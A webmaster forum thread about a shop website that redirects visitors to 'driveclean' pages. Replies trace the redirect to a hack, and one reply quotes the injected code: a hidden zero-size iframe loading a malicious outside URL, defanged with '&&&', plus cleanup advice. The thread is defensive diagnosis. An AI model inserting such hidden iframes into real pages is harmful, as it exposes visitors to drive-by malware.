    website automatically forwards to driveclean

    hi all

its only in the past week or so but my website has automatically been directed to drive clean.com

if you go to www.beddingcentres.co.uk you will see what i mean.

would any one know why this is or how i can resolve it? have compacted dateabases, checked the aug and checked a few other forums but cannot seem to find anything

any one got any ideas please?

Is drive clean.com anything to do with you?

Your post makes it sound like you have been hacked so you probably won't get many people wanting to click onto your site.
    Cheers

      ugh...
I have that same problem when I visit another website I occasionally use for sending online greetings cards. I've stopped using it now because of the drive clean popup/intrusion.
I'd always assumed it was something to do with their website but maybe it isn't then.

Can't help with how to fix it though, sorry. I suspect it's nothing actually to do with the Actinic software itself though...not that it's any consolation!

it did do it for me...but only once I'd got a couple of pages into the website

It's loading something from "lookme.biz" and, after time, starts to load "driveclean.lookme.biz"

(I was watching my status bar as the pages loaded)

It's not doing it on all the pages though. Doesn't appear to do it on the actual main product pages..just the listings ones

thanks guys. i have the avg software already and its not detected anything. i have contacted our server hosting company who have yet to get back to me. i noticed that a few other of their sites relocate to other pages so maybe its something on their system? what do you think?

shall i scan the site 1 root folder files anyway?

there's nothing in the view source to reference it

certainly seems strange but I think you need to get in contact with your hosting company and see what they say

thanks guys for all your help. waiting for them to get back to me (but theya re useless ha ha) and scanning folder as we speak.

i dont believe i have added anything inadvertently adn as its happening to a few other websites hosted by them, it may be a fault on their server. so fingers crossed. we are changing hosting anyway!

thanks guys really appreciate your help. when i get a solution will post it!

It's almost certainly a hack. Probably this bit that's been added to the end of your pages:

                <hr /> <html><iframe width=0 height=0 frameborder=0 src= http://www.free&&&20.com/portal/index.php?aff=metalizor marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
The first thing I would do is a full site refresh as this should remove it. Then change your password.

Also check that there isn't other stuff on your server that shouldn't be there.

                Mike

PS. Don't click on the link as it will almost certainly try and load a trojan and/or other stuff onto your pc. I'll kill the url with &&& in the middle, so anyone desparate to take a look can just remove them.

This is very similar to a problem george had a few months ago.
